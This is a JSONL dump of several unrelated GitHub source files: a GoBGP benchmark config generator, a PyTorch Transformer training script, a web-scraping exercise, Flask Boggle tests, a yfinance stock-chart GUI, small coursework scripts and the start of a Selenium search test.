github.com/osrg/gobgp/gobgpd\nRUN go install github.com/osrg/gobgp/gobgp\n'''.format(checkout)\n super(GoBGP, cls).build_image(force, tag, nocache)\n\n\nclass GoBGPTarget(GoBGP, Target):\n\n CONTAINER_NAME = 'bgperf_gobgp_target'\n CONFIG_FILE_NAME = 'gobgpd.conf'\n\n def write_config(self, scenario_global_conf):\n\n config = {}\n config['global'] = {\n 'config': {\n 'as': self.conf['as'],\n 'router-id': self.conf['router-id']\n },\n }\n if 'policy' in scenario_global_conf:\n config['policy-definitions'] = []\n config['defined-sets'] = {\n 'prefix-sets': [],\n 'bgp-defined-sets': {\n 'as-path-sets': [],\n 'community-sets': [],\n 'ext-community-sets': [],\n },\n }\n for k, v in list(scenario_global_conf['policy'].items()):\n conditions = {\n 'bgp-conditions': {},\n }\n for i, match in enumerate(v['match']):\n n = '{0}_match_{1}'.format(k, i)\n if match['type'] == 'prefix':\n config['defined-sets']['prefix-sets'].append({\n 'prefix-set-name': n,\n 'prefix-list': [{'ip-prefix': p} for p in match['value']]\n })\n 
conditions['match-prefix-set'] = {'prefix-set': n}\n elif match['type'] == 'as-path':\n config['defined-sets']['bgp-defined-sets']['as-path-sets'].append({\n 'as-path-set-name': n,\n 'as-path-list': match['value'],\n })\n conditions['bgp-conditions']['match-as-path-set'] = {'as-path-set': n}\n elif match['type'] == 'community':\n config['defined-sets']['bgp-defined-sets']['community-sets'].append({\n 'community-set-name': n,\n 'community-list': match['value'],\n })\n conditions['bgp-conditions']['match-community-set'] = {'community-set': n}\n elif match['type'] == 'ext-community':\n config['defined-sets']['bgp-defined-sets']['ext-community-sets'].append({\n 'ext-community-set-name': n,\n 'ext-community-list': match['value'],\n })\n conditions['bgp-conditions']['match-ext-community-set'] = {'ext-community-set': n}\n\n config['policy-definitions'].append({\n 'name': k,\n 'statements': [{'name': k, 'conditions': conditions, 'actions': {'route-disposition': {'accept-route': True}}}],\n })\n\n\n def gen_neighbor_config(n):\n c = {'config': {'neighbor-address': n['local-address'], 'peer-as': n['as']},\n 'transport': {'config': {'local-address': self.conf['local-address']}},\n 'route-server': {'config': {'route-server-client': True}}}\n if 'filter' in n:\n a = {}\n if 'in' in n['filter']:\n a['in-policy-list'] = n['filter']['in']\n a['default-in-policy'] = 'accept-route'\n if 'out' in n['filter']:\n a['export-policy-list'] = n['filter']['out']\n a['default-export-policy'] = 'accept-route'\n c['apply-policy'] = {'config': a}\n return c\n\n config['neighbors'] = [gen_neighbor_config(n) for n in list(flatten(list(t.get('neighbors', {}).values()) for t in scenario_global_conf['testers'])) + [scenario_global_conf['monitor']]]\n with open('{0}/{1}'.format(self.host_dir, self.CONFIG_FILE_NAME), 'w') as f:\n f.write(yaml.dump(config, default_flow_style=False))\n\n def get_startup_cmd(self):\n return '\\n'.join(\n ['#!/bin/bash',\n 'ulimit -n 65536',\n 'gobgpd -t yaml -f {guest_dir}/{config_file_name} -l {debug_level} > {guest_dir}/gobgpd.log 2>&1']\n ).format(\n guest_dir=self.guest_dir,\n config_file_name=self.CONFIG_FILE_NAME,\n debug_level='info')\n","repo_name":"PacktPublishing/Python-Network-Programming-Cookbook-Second-Edition","sub_path":"Chapter14/14_2_benchmark_with_bgperf/gobgp.py","file_name":"gobgp.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"72"} +{"seq_id":"21854836965","text":"'''\nauthor: hzj\ndate: 2022-4-9\nfile info: 搭建transformer模型\n'''\nimport torch.nn as nn\nimport numpy as np\nimport torch\nfrom torch import Tensor\nimport torch.optim as optim\nimport csv\nfrom torch.optim.lr_scheduler import ExponentialLR, ReduceLROnPlateau\nfrom DataGenerate.seq2Traindata import SeqDataset\nfrom torch.utils.data import DataLoader\nimport pandas\nfrom torchtext.legacy.data import Field, TabularDataset, BucketIterator, Iterator\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n\nclass NoamLR(object):\n def __init__(self, optimizer, warmup_steps, d_model, last_epoch=-1):\n super(NoamLR, self).__init__()\n\n self.optimizer = optimizer\n self.warmup_steps = warmup_steps\n self.d_model = d_model\n self.step_count = 0\n\n if last_epoch == -1:\n for group in optimizer.param_groups:\n group.setdefault('initial_lr', group['lr'])\n\n self.last_epoch = last_epoch\n self.base_lrs = [group['initial_lr'] for group in optimizer.param_groups]\n\n def get_lr(self):\n # step_num = self.step_count + 1\n # warmupLR\n 
# return [\n # base_lr * self.warmup_steps ** 0.5 * min(self.step_count ** -0.5,\n # self.step_count * self.warmup_steps ** -1.5)\n # for base_lr in self.base_lrs]\n # NoamLR\n return [\n base_lr * self.d_model ** -0.5 * min(self.step_count ** -0.5, self.step_count * self.warmup_steps ** -1.5)\n for base_lr in self.base_lrs]\n\n def step(self, epoch=None):\n if epoch == None:\n self.step_count += 1\n values = self.get_lr()\n\n for i, data in enumerate(zip(self.optimizer.param_groups, values)):\n param_group, lr = data\n param_group['lr'] = lr\n\n\ndef tokenize(text):\n return text.replace(' ', '')[1:-1].split(',')\n\n\nSRC = Field(\n sequential=True,\n tokenize=tokenize,\n init_token=None,\n eos_token=None,\n pad_token='',\n unk_token=''\n)\nTGT = Field(\n sequential=True,\n tokenize=tokenize,\n init_token='',\n eos_token='',\n pad_token='',\n unk_token=''\n)\n\n# csv里的每一列都要设置,不需要的类可以这样:(列名,None)\nfields = [('TGT', TGT), ('SRC', SRC)]\ntrain_data, validation_data, test_data = TabularDataset.splits(\n path='../DataGenerate/',\n train='trainDataSet20000.csv',\n validation='testDataSet20000.csv',\n test='test.csv',\n format='csv',\n skip_header=True,\n fields=fields\n)\n\n# 设置最小词频min_freq,当一个单词在数据集中出现次数小于min_freq时会被转换为字符\nSRC.build_vocab(train_data, min_freq=10)\nTGT.build_vocab(train_data, min_freq=1)\n# stoi返回defaultdict词表\nsrc_vocab = SRC.vocab.stoi\ntgt_vocab = TGT.vocab.stoi\nsrc_idx2word = {src_vocab[key]: key for key in src_vocab}\ntgt_idx2word = {tgt_vocab[key]: key for key in tgt_vocab}\nsrc_vocab_size = len(SRC.vocab)\ntgt_vocab_size = len(TGT.vocab)\nbatch_size = 128\n\n# 使用BucketIterator迭代器处理数据集\ntrain_iter, validation_iter, test_iter = BucketIterator.splits(\n datasets=(train_data, validation_data, test_data),\n # batch_sizes=(batch_size, batch_size, batch_size),\n batch_size=batch_size,\n sort_within_batch=True,\n sort_key=lambda x: len(x.SRC),\n shuffle=True\n)\n\n\nclass NegativeSurvey_Transformer(nn.Module):\n def __init__(\n self,\n d_model: int = 512,\n nhead: int = 8,\n num_encoder_layers: int = 6,\n num_decoder_layers: int = 6,\n dim_feedforward: int = 2048,\n dropout: float = 0.1\n ):\n super(NegativeSurvey_Transformer, self).__init__()\n # 初始化transformer模型\n self.transformer = nn.Transformer(\n d_model=d_model,\n nhead=nhead,\n num_encoder_layers=num_encoder_layers,\n num_decoder_layers=num_decoder_layers,\n dim_feedforward=dim_feedforward,\n dropout=dropout\n )\n\n # 词嵌入对象以及位置embedding\n self.src_word_embedding = nn.Embedding(\n num_embeddings=src_vocab_size,\n embedding_dim=d_model,\n padding_idx=src_vocab[SRC.pad_token]\n )\n # self.src_position_embedding = nn.Embedding.from_pretrained()\n self.trg_word_embedding = nn.Embedding(\n num_embeddings=tgt_vocab_size,\n embedding_dim=d_model,\n padding_idx=tgt_vocab[TGT.pad_token]\n )\n self.dropout = nn.Dropout(dropout)\n\n self.d_model = d_model\n # 线性层\n self.projection = nn.Linear(d_model, tgt_vocab_size, bias=False)\n\n def forward(self, src: Tensor, tgt: Tensor):\n '''\n\n :param inputs: [S, N]\n :param outputs: [T, N]\n :param src_padding_index: 编码序列的padding符号表示下标\n :param tgt_padding_index: 解码序列的padding符号表示下标\n :return:\n '''\n src_len, N = src.shape\n tgt_len, N = tgt.shape\n\n # 生成输入输出编码\n src_word_emb = self.src_word_embedding(src)\n tgt_word_emb = self.trg_word_embedding(tgt)\n src_word_emb = self.dropout(src_word_emb)\n tgt_word_emb = self.dropout(tgt_word_emb)\n src_position = self.PositionEncoding(src_len, self.d_model).unsqueeze(1)\n tgt_position = self.PositionEncoding(tgt_len, self.d_model).unsqueeze(1)\n 
encoding_inputs = src_word_emb + src_position\n encoding_outputs = tgt_word_emb + tgt_position\n # 因为pytorch的transformer模型要求输入的src和tgt维度为[S, N, E]/[T, N, E],todo:传统RNN的每一步要输入每个样例的一个单词的影响?\n # encoding_inputs = encoding_inputs.transpose(0, 1)\n # encoding_outputs = encoding_outputs.transpose(0, 1)\n # encoding_inputs = self.dropout(encoding_inputs)\n # encoding_outputs = self.dropout(encoding_outputs)\n # src_pad_index = src_vocab[SRC.pad_token]\n # tgt_pad_index = tgt_vocab[TGT.pad_token]\n src_key_padding_mask = self.generate_key_padding_mask(src, pad_index=src_vocab[SRC.pad_token])\n tgt_key_padding_mask = self.generate_key_padding_mask(tgt, pad_index=tgt_vocab[TGT.pad_token])\n '''注意这里memory_key_padding_mask和src_key_padding_mask值相同'''\n memory_key_padding_mask = src_key_padding_mask\n memory_mask = self.generate_memory_mask(tgt_len, src_len)\n # 生成tgt_attn_mask\n tgt_mask = self.transformer.generate_square_subsequent_mask(tgt_len)\n # 对于pytorch的transformer模型,Decoder中把两种mask矩阵相加(既屏蔽了pad的信息,也屏蔽了未来时刻的信息)\n out = self.transformer(\n encoding_inputs,\n encoding_outputs,\n src_key_padding_mask=src_key_padding_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n # memory_key_padding_mask=memory_key_padding_mask,\n memory_mask=memory_mask,\n tgt_mask=tgt_mask\n )\n\n out = self.projection(out)\n # 转置之后tensor属性更改,语义上不再是连续的(该情况下调用view无效),所以调用contiguous方法使其语义连续\n # return out.view(-1, out.size(-1))\n return out\n\n @staticmethod\n # 进行位置编码\n def PositionEncoding(positions, d_model):\n def calculate_dim(position, dim):\n return position / pow(10000, 2 * (dim // 2) / d_model)\n\n def calculate_dim_vector(position):\n return [calculate_dim(position, dim) for dim in range(d_model)]\n\n position_encoding = np.array([calculate_dim_vector(position) for position in range(positions)])\n position_encoding[:, 0::2] = np.sin(position_encoding[:, 0::2])\n position_encoding[:, 1::2] = np.sin(position_encoding[:, 1::2])\n\n return torch.FloatTensor(position_encoding)\n\n @staticmethod\n def generate_key_padding_mask(seq_k, pad_index):\n '''\n\n :param seq_k: [batch_size, seq_len]\n :param pad_index: 用于padding_mask的数据下标\n :return: 生成序列k对应的key_padding_mask\n pytorch的transformer框架内部已经实现了key_padding_mask维度拓宽,\n 所以之类我们输入的长度key_padding_mask维度为[N, k_len]\n '''\n # eq(pad_index) is PAD token\n # key_padding_mask = seq_k.data.eq(pad_index).unsqueeze(1) # [batch_size, 1, len_k], True is masked\n # key_padding_mask = seq_k.data.eq(pad_index) # [batch_size, len_k], True is masked\n # return key_padding_mask # [batch_size, len_k]\n return seq_k.transpose(0, 1) == pad_index\n\n @staticmethod\n def generate_memory_mask(tgt_len, src_len):\n '''\n 这里就是为负调查特定设定的memory_mask,因为我们希望某一个位置的正调查对相同位置的负调查数据是没有关注度的;\n 又因为tgt增加了开始符结束符,所以在最后预测结束符的时候可以用全局信息,是不需要mask的\n :param tgt_len: 目标序列的长度\n :param src_len: 源序列长度\n :return: memory_mask: :math:(T, S)\n '''\n mask = (torch.ones(tgt_len, src_len)) == 1\n for i in range(src_len):\n mask[i, i] = False\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n\n# 模型训练函数\ndef model_train_method(\n model: NegativeSurvey_Transformer,\n epoch_num: int,\n lr: float\n):\n model.train(mode=True)\n\n criterion = nn.CrossEntropyLoss(ignore_index=tgt_vocab[TGT.pad_token])\n '''\n weight_decay是L2正则化理论中出现的概念(L2范数就是:loss+所有权重的平方开方和,这样就是为了约束参数的大小)\n 参数很大,一个小的变动,都会产生很大的不同,所以加上L2范数很好地解决过拟合的问题\n pytorch中backward计算梯度,但是L2正则项不是通过backward计算的,在梯度下降的算法中,梯度=原始梯度+权重衰减系数*权重系数(结果和backward是一样的)\n '''\n # optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, 
weight_decay=0.0005)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n NoamScheduler = NoamLR(optimizer=optimizer, warmup_steps=50, d_model=model.d_model)\n\n for epoch in range(epoch_num):\n # 对于warmup策略,必须要在梯度更新前进行一次step将梯度调整到最低\n NoamScheduler.step()\n\n loss_list = []\n for batch_idx, batch in enumerate(train_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n output = model(\n src=src,\n tgt=tgt[:-1]\n )\n output = output.reshape(-1, output.shape[-1])\n # item = tgt[1:].view(-1)\n loss = criterion(output, tgt[1:].view(-1))\n loss_list.append(round(loss.data.item(), 4))\n print('Epoch: %04d' % (epoch + 1) + '/' + str(epoch_num), 'loss= {:.6f}'.format(loss))\n optimizer.zero_grad()\n loss.backward()\n\n # todo: 对所有参数的梯度进行规范化\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1)\n optimizer.step()\n\n # 将每个epoch的loss损失函数值记录到loss.csv文件中\n with open('loss.csv', mode='a', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(loss_list)\n\n if epoch % 10 == 0:\n valid_loss_list = []\n for batch_idx, batch in enumerate(validation_iter):\n src_valid = batch.SRC\n tgt_valid = batch.TGT\n\n output = model(\n src=src_valid,\n tgt=tgt_valid[:-1]\n )\n output = output.reshape(-1, output.shape[-1])\n loss = criterion(output, tgt_valid[1:].view(-1))\n valid_loss_list.append(round(loss.data.item(), 4))\n print('-----valid-loss = {:.6f}-----'.format(loss))\n\n with open('valid_loss.csv', mode='a', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(valid_loss_list)\n torch.save(model.state_dict(), '../trained_models/' + str(epoch) + 'model_5.pt')\n\n # torch.save(model.state_dict(), 'model.pt')\n\n\ndef model_train_method2(\n model: NegativeSurvey_Transformer,\n epoch_num: int,\n lr: float\n):\n model.train(mode=True)\n\n criterion = nn.CrossEntropyLoss(ignore_index=tgt_vocab[TGT.pad_token])\n '''\n weight_decay是L2正则化理论中出现的概念(L2范数就是:loss+所有权重的平方开方和,这样就是为了约束参数的大小)\n 参数很大,一个小的变动,都会产生很大的不同,所以加上L2范数很好地解决过拟合的问题\n pytorch中backward计算梯度,但是L2正则项不是通过backward计算的,在梯度下降的算法中,梯度=原始梯度+权重衰减系数*权重系数(结果和backward是一样的)\n '''\n # optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=0.1)\n optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=0.01)\n NoamScheduler = NoamLR(optimizer=optimizer, warmup_steps=50, d_model=model.d_model)\n\n for epoch in range(epoch_num):\n # 对于warmup策略,必须要在梯度更新前进行一次step将梯度调整到最低\n NoamScheduler.step()\n\n for batch_idx, batch in enumerate(train_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n dec_input = tgt[:1]\n tgt_len = len(tgt) - 1\n global output\n for i in range(tgt_len):\n output = model(\n src=src,\n tgt=dec_input\n )\n # predict = output.argmax(dim=-1).reshape(-1, output.shape[0])\n predict = output.argmax(dim=-1)[-1:]\n dec_input = torch.cat((dec_input, predict), dim=0)\n\n output = output.reshape(-1, output.shape[-1])\n # item = tgt[1:].view(-1)\n loss = criterion(output, tgt[1:].view(-1))\n print('Epoch: %04d' % (epoch + 1) + '/' + str(epoch_num), 'loss= {:.6f}'.format(loss))\n optimizer.zero_grad()\n loss.backward()\n\n # todo:对所有参数的梯度进行规范化\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1)\n optimizer.step()\n\n if epoch % 10 == 0:\n torch.save(model.state_dict(), '../trained_models/' + str(epoch) + 'model.pt')\n\n # torch.save(model.state_dict(), 'model.pt')\n\n\ndef model_test_method(model: nn.Module):\n model.eval()\n with torch.no_grad():\n for batch_idx, batch in enumerate(test_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n output = model(\n src=src,\n tgt=tgt[:-1]\n )\n # predict = 
output.argmax(dim=-1).reshape(-1, output.shape[0])\n predict = output.argmax(dim=-1).transpose(0, 1)\n source = src.transpose(0, 1)\n target = tgt[1:].transpose(0, 1)\n for i in range(len(predict)):\n print([src_idx2word[int(x)] for x in source[i]], '->', [tgt_idx2word[int(y)] for y in target[i]], '->',\n [tgt_idx2word[int(z)] for z in predict[i]])\n\n # if batch_idx > 10:\n # break\n\n\ndef model_test_method2(model: nn.Module):\n model.eval()\n with torch.no_grad():\n for batch_idx, batch in enumerate(test_iter):\n src = batch.SRC\n tgt = batch.TGT\n\n dec_input = tgt[:1]\n tgt_len = len(tgt) - 1\n global output\n for i in range(tgt_len):\n output = model(\n src=src,\n tgt=dec_input\n )\n # predict = output.argmax(dim=-1).reshape(-1, output.shape[0])\n predict = output.argmax(dim=-1)[-1:]\n dec_input = torch.cat((dec_input, predict), dim=0)\n target = tgt[1:].transpose(0, 1)\n output = output.argmax(dim=-1).transpose(0, 1)\n for i in range(len(target)):\n print([tgt_idx2word[int(n)] for n in target[i]], '->', [tgt_idx2word[int(m)] for m in output[i]])\n\n\nif __name__ == '__main__':\n # trainedmodel-3.pt,lr=0.01,warmup_step=50,weight_decay=0\n # model = NegativeSurvey_Transformer(\n # d_model=256,\n # nhead=4,\n # num_encoder_layers=3,\n # num_decoder_layers=3,\n # dim_feedforward=1024\n # )\n\n model = NegativeSurvey_Transformer(\n d_model=512,\n nhead=4,\n num_encoder_layers=3,\n num_decoder_layers=3,\n dim_feedforward=2048,\n dropout=0.3\n )\n load_state_dict = torch.load('../transformer_models/100model_5.pt')\n model.load_state_dict(load_state_dict)\n\n # model_train_method(\n # model=model,\n # epoch_num=200,\n # lr=0.1\n # )\n # named_parameters = model.named_parameters()\n # params_0 = [p for n, p in named_parameters]\n # temp = [n for n, p in named_parameters]\n #\n model_test_method(model=model)\n # model_test_method2(model=model)\n","repo_name":"huang-zi-jian/Negative-Survey-Based-On-Deep-Learning","sub_path":"Models/mode1.py","file_name":"mode1.py","file_ext":"py","file_size_in_byte":17460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36295991770","text":"import requests\nimport parsel\n\nbase_url = 'http://books.toscrape.com/catalogue/'\nresponse = requests.get(base_url + 'the-grand-design_405/index.html')\nselector = parsel.Selector(text=response.text)\ntitle = selector.css('.product_main h1::text').get()\nprice = selector.css('.product_main p::text').re_first(r\"\\d*\\.\\d{2}\")\n# recupera a descrição do produto\n# ~ significa a tag irmã\ndescription = selector.css('#product_description ~ p::text').get()\nsuffix = '...more'\nimg_url = base_url + selector.css('.active img::attr(src)').get()\ntable = selector.css('.table tr td::text').getall()\n\nprint(title,price,description[:-len(suffix)], img_url, table[5][10:11], sep=',')","repo_name":"Caique-Ferian/trybe-exercicios","sub_path":"Ciência-da-Computação/REDES-E-RASPAGEM-DE-DADOS/dia-2-raspagem-de-dados/exercise_4_and_5.py","file_name":"exercise_4_and_5.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"11539746732","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nt = int(input())\r\nfor tc in range(t):\r\n n = int(input())\r\n data = [list(map(int,input().split())) for _ in range(n)]\r\n data = sorted(data)\r\n min_value = data[0][1]\r\n count = 1\r\n for i in range(n):\r\n if data[i][1] < min_value:\r\n count += 1\r\n min_value = data[i][1]\r\n 
print(count)","repo_name":"HyemIin/algorithm-code-test","sub_path":"백준/Silver/1946. 신입 사원/신입 사원.py","file_name":"신입 사원.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7472924131","text":"from unittest import TestCase\n\nfrom app import app, games\n\n# Make Flask errors be real errors, not HTML pages with error info\napp.config[\"TESTING\"] = True\n\n# This is a bit of hack, but don't use Flask DebugToolbar\napp.config[\"DEBUG_TB_HOSTS\"] = [\"dont-show-debug-toolbar\"]\n\n\nclass BoggleAppTestCase(TestCase):\n \"\"\"Test flask app of Boggle.\"\"\"\n\n def setUp(self):\n \"\"\"Stuff to do before every test.\"\"\"\n\n self.client = app.test_client()\n app.config[\"TESTING\"] = True\n\n def test_homepage(self):\n \"\"\"Make sure information is in the session and HTML is displayed\"\"\"\n\n with self.client as client:\n response = client.get(\"/\")\n html = response.get_data(as_text=True)\n\n self.assertEqual(response.status_code, 200)\n self.assertIn('', html)\n ...\n # test that you're getting a template\n\n def test_api_new_game(self):\n \"\"\"Test starting a new game.\"\"\"\n\n with self.client as client:\n ...\n response = client.post(\"/api/new-game\")\n json = response.get_json()\n game_id = json[\"gameId\"]\n board = json[\"board\"]\n\n self.assertIsInstance(game_id, str)\n self.assertIsInstance(board, list)\n self.assertIsInstance(board[0], list)\n\n self.assertIn(game_id, games)\n\n # make a post request to /api/new-game\n # get the response body as json using .get_json()\n # test that the game_id is a string\n # test that the board is a list\n # test that the game_id is in the dictionary of games (imported from app.py above)\n\n def test_score_word(self):\n \"\"\"Test if word is valid\"\"\"\n\n with self.client as client:\n ...\n response = client.post(\"/api/new-game\")\n json = response.get_json()\n game_id = json[\"gameId\"]\n\n game = games[game_id]\n game.board = [\n [\"I\", \"S\", \"E\", \"M\", \"E\"],\n [\"N\", \"S\", \"D\", \"S\", \"G\"],\n [\"B\", \"O\", \"A\", \"R\", \"P\"],\n [\"G\", \"S\", \"P\", \"A\", \"X\"],\n [\"Y\", \"X\", \"B\", \"E\", \"C\"],\n ]\n\n t1 = client.post(\n \"/api/score-word\", json={\"gameId\": game_id, \"word\": \"BOARD\"}\n )\n t1json = t1.get_json()\n self.assertEqual(t1json, {\"result\": \"ok\"})\n\n t2 = client.post(\n \"/api/score-word\", json={\"gameId\": game_id, \"word\": \"WEIRD\"}\n )\n t2json = t2.get_json()\n self.assertEqual(t2json, {\"result\": \"not-on-board\"})\n\n t3 = client.post(\n \"/api/score-word\", json={\"gameId\": game_id, \"word\": \"GHINWEKA\"}\n )\n t3json = t3.get_json()\n self.assertEqual(t3json, {\"result\": \"not-word\"})\n\n # make a post request to /api/new-game\n # get the response body as json using .get_json()\n # find that game in the dictionary of games (imported from app.py above)\n\n # manually change the game board's rows so they are not random\n\n # test to see that a valid word on the altered board returns {'result': 'ok'}\n # test to see that a valid word not on the altered board returns {'result': 'not-on-board'}\n # test to see that an invalid word returns {'result': 'not-word'}\n","repo_name":"Ashley-Y-Lin/flask-boggle","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36112270057","text":"import matplotlib\n\nmatplotlib.use(\"TkAgg\")\nfrom 
matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom matplotlib.figure import Figure\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\nimport tkinter as tk\nfrom tkinter import ttk\nimport yfinance as yf\n\nimport mpl_finance as mpf\nimport matplotlib.dates as mdates\n\nimport plotly.graph_objects as go\nimport plotly.subplots as sp\nimport matplotlib.pyplot as plt\n\nfrom Trading_main import *\n\nLARGE_FONT = (\"Verdana\", 12)\nstyle.use(\"ggplot\")\n\nimport pandas as pd\nimport numpy as np\n\nstart_date = \"2022-01-01\"\nend_date = \"2023-01-01\"\nstock = 'AAPL'\nallStocks = {}\ndf = yf.download(stock, start=start_date, end=end_date)\nallStocks[stock] = df\nquotes = zip(mdates.date2num(df.index.to_pydatetime()), df['Open'], df['High'], df['Low'], df['Close'])\n\nfig = Figure(figsize=(5, 5), dpi=100)\na = fig.add_subplot(111)\na.set_title(stock)\n\ndef animate(i):\n if stock in allStocks:\n df = allStocks[stock]\n print('stock already downloaded')\n else:\n df = yf.download(stock, start=start_date, end=end_date)\n print('downloading stock')\n \n quotes = zip(mdates.date2num(df.index.to_pydatetime()), df['Open'], df['High'], df['Low'], df['Close'])\n mpf.candlestick_ohlc(a, quotes, width=0.6, colorup='g', colordown='r')\n a.xaxis.set_major_locator(mdates.AutoDateLocator())\n a.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))\n fig.autofmt_xdate()\n\n\nclass TradingGUI(tk.Tk):\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n tk.Tk.wm_title(self, \"Trading GUI\")\n\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n for F in (PageOne, GraphPage):\n frame = F(container, self)\n self.frames[F] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n self.show_frame(PageOne)\n \n def show_frame(self, cont):\n frame = self.frames[cont]\n frame.tkraise()\n\nclass PageOne(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label = tk.Label(self, text=\"Page One!!!\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n def get_text():\n # Get the text from the input box\n global stock\n global start_date\n global end_date\n start_date = start_date_entry.get()\n end_date = end_date_entry.get()\n stock = stock_entry.get()\n\n def submit_and_show_frame():\n global quotes\n get_text()\n a.clear()\n a.set_title(stock)\n df = yf.download(stock, start=start_date, end=end_date)\n quotes = zip(mdates.date2num(df.index.to_pydatetime()), df['Open'], df['High'], df['Low'], df['Close'])\n controller.show_frame(GraphPage)\n\n def runAnalyseLastMonth():\n global allStocks\n allStocks = analyseLastMonth()\n \n # Create a label and entry for stock ticker\n stock_label = ttk.Label(self, text=\"Stock Ticker:\")\n stock_entry = ttk.Entry(self)\n # Set a placeholder for stock entry\n stock_entry.insert(0, \"AAPL\")\n stock_label.pack(pady=10, padx=10)\n stock_entry.pack()\n\n # Create a label and entry for start date\n start_date_label = ttk.Label(self, text=\"Start Date (YYYY-MM-DD):\")\n start_date_entry = ttk.Entry(self)\n # Set a placeholder for start date entry\n start_date_entry.insert(0, start_date)\n start_date_label.pack(pady=10, padx=10)\n start_date_entry.pack()\n\n # Create a label and entry for end date\n end_date_label = ttk.Label(self, text=\"End Date (YYYY-MM-DD):\")\n end_date_entry = ttk.Entry(self)\n # Set a 
placeholder for end date entry\n end_date_entry.insert(0, end_date)\n end_date_label.pack(pady=10, padx=10)\n end_date_entry.pack()\n \n # Create a submit button\n submit_button = ttk.Button(self, text=\"Submit\", command = submit_and_show_frame)\n submit_button.pack()\n\n buttonRun = ttk.Button(\n self, text=\"Run analysis for stock\", command= lambda:runScript(stock,start_date,end_date)\n )\n buttonRun.pack()\n \n buttonRunAll = ttk.Button(\n self, text=\"Run script for all stocks\", command= lambda:runAnalyseLastMonth()\n )\n buttonRunAll.pack() \n \n\nclass GraphPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label = tk.Label(self, text=\"Graph Page!\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n button1 = ttk.Button(\n self, text=\"Back to Home\", command=lambda: controller.show_frame(PageOne)\n )\n button1.pack() \n \n canvas = FigureCanvasTkAgg(fig, self)\n canvas.draw()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n toolbar = NavigationToolbar2Tk(canvas, self)\n toolbar.update()\n canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n\n\napp = TradingGUI()\nani = animation.FuncAnimation(fig, animate, interval=1000)\napp.mainloop()\n","repo_name":"MartinDeV1991/stock-market-analysis","sub_path":"Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26267876028","text":"from cs50 import get_string\n\n\ntext = get_string(\"Text: \")\nw = len(text.split()) # splits the string in words using spaces as delimiter, then takes length as number of words\nl = 0\ns = 0\n\nfor i in text:\n if i.isalpha(): # each alphabetic character is counted as a letter\n l += 1\n elif i in [\".\", \"?\", \"!\"]: # each . or ? or ! 
is counted as end of a sentence\n s += 1\nl = l / w * 100 # divide by number of words and multiplied by a 100 gives the average number of letters per 100 words\ns = s / w * 100\n\ncoleman = 0.0588 * l - 0.296 * s - 15.8 # calculate the Coleman Liau index\n\nif coleman >= 16:\n print(\"Grade 16+\")\nelif coleman < 1:\n print(\"Before Grade 1\")\nelse:\n print(f\"Grade {int(round(coleman))}\")\n","repo_name":"tommyvdz/cs50","sub_path":"pset6/readability/readability.py","file_name":"readability.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14278756031","text":"from machine import Pin\r\nfrom time import sleep\r\n\r\ndef main():\r\n #pico:\r\n #pin=Pin(25, Pin.OUT)\r\n #picow:\r\n pin=Pin(\"LED\", Pin.OUT)\r\n\r\n print(\"starting program\")\r\n for i in range(6):\r\n pin.high()\r\n sleep(.5)\r\n pin.low()\r\n sleep(.5)\r\n \r\n print(\"ending program\")\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"gobbyo/IoT","sub_path":"python/raspberrypi/pico/simpleLED.py","file_name":"simpleLED.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38445255852","text":"#!/usr/bin/python3\n# -*- encoding=utf8 -*-\n\nimport time\nfrom pages import YandexMainPage\nfrom pages import YandexSearchResultsPage\n\n\ndef test_search_some_long_text(selenium):\n page = YandexMainPage(selenium)\n\n page.search_text = 'a' * 1000\n page.search_button.click()\n\n 